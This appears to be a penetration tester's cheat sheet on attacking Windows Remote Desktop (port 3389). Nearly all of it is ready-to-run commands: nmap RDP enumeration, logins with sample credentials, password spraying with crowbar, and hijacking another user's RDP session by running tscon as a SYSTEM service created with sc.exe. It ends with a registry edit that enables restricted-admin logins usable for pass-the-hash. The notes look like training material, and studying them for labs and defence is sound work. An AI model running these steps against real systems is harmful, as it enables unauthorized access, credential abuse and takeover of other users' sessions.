#rdp #remoteDesktop #port `3389` ```shell nmap -sV -sC 10.129.201.248 -p3389 --script rdp* ``` ```shell xfreerdp /v:<target-IP> /u:<username> /p:<password> ``` ```shell # Installation and Configuration sudo cpan # RDP Security Check git clone https://github.com/CiscoCXSecurity/rdp-sec-check.git && cd rdp-sec-check ./rdp-sec-check.pl 10.129.201.248 # Initiate an RDP session xfreerdp /u:cry0l1t3 /p:"P455w0rd!" /v:10.129.201.248 ``` ```shell rdesktop -u admin -p password123 192.168.2.143 ``` ![[Miscellaneous File Transfers#RDP]] ## Password Spraying ### Crowbar ```shell crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' ``` ## RDP Session Hijacking ```powershell tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} ``` If we have local administrator privileges, we can use several methods to obtain `SYSTEM` privileges, such as [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) or [Mimikatz](https://github.com/gentilkiwi/mimikatz). A simple trick is to create a Windows service that, by default, will run as `Local System` and will execute any binary with `SYSTEM` privileges. We will use [Microsoft sc.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-create) binary. First, we specify the service name (`sessionhijack`) and the `binpath`, which is the command we want to execute. Once we run the following command, a service named `sessionhijack` will be created. ```powershell sc.exe create sessionhijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0" ``` ```powershell net start sessionhijack ``` ## Adding the DisableResrictedAdmin Registry Key ```powershell reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f ```